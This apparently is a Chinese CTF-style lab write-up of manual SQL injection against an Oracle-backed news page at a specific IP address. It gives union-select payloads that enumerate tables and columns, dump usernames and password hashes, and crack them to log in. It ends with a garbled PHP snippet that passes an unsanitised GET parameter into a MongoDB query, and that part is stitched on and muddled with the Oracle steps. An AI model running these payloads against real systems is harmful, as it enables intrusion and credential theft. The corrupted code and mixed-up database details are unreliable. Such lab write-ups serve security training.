手工进行SQL注入测试,获取管理密码登录。
http://219.153.49.228:41733/new_list.php?id=1 order by 3
order by猜字段 2正常 3不正常
联合查询测回显点
http://219.153.49.228:41733/new_list.php?id=1 union select '1','2' from dual
发现 1 2都是回显点都可以进行注入
爆库:
http://219.153.49.228:41733/new_list.php?id=1 and 1=2 union select '1',(select table_name from user_tables where rownum=1 and table_name='sns_users') from dual
模糊爆库
http://219.153.49.228:41733/new_list.php?id=1 and 1=2 union select '1',(select table_name from user_tables where rownum=1 and table_name like '%user%') from dual
此时利用普通爆库语句和模糊爆库都发现只有一个名为’sns_users’的库 那继续往下进行 记得记录好信息
爆列名:
http://219.153.49.228:41733/new_list.php?id=1 and 1=2 union select '1',(select column_name from all_tab_columns where rownum=1 and table_name ='sns_users') from dual
爆其他列名:
http://219.153.49.228:41733/new_list.php?id=1 and 1=2 union select '1',(select column_name from all_tab_columns where rownum=1 and table_name ='sns_users' and column_name not in ('USER_NAME')) from dual
也就是在后面拼接 and column_name not in (‘库名’)
发现还有一个USER_PWD这个列名 然后我们继续爆数据
http://219.153.49.228:41733/new_list.php?id=1 and 1=2 union select user_name,user_pwd from "sns_users"
发现有个用户名叫“hu” cmd5进行解密 密码等于796680 尝试登录 发现密码错误
排除 “hu”这个用户 再爆其用户
在上一条语句中拼接 where user_name<>‘hu’ 这条语句 表示查询数据 排除“hu”这个用户
这个应该就是正确的账号密码 为了实验严谨 我们把数据全部爆完 也就是再在后面拼接一条排除语句
至此 所有的用户都已经爆出来了 都进行 cmd5解密 “hu”这个用户已经测试过了 是密码错误
在利用 “墨者这个用户登录” cmd5密码解密为“796680”
MongoDB数据库成功登录 拿到flag
<7php
header('content-type:text/html;charset=utf-8°);
require_once config·php';
$b=mongo->mozhe_cms_Authority;
d=_GET['id'];
$query="var data=db·notice.findone({'id':$id}); return data;;
$obj=sdb->execute($query);
7>
chtml lang=" ens
cheads
<meta charset="UTF-8”
XWAY科技管理系统V3.0
$obj['retval'] ['titlel] ?
评论列表(0条)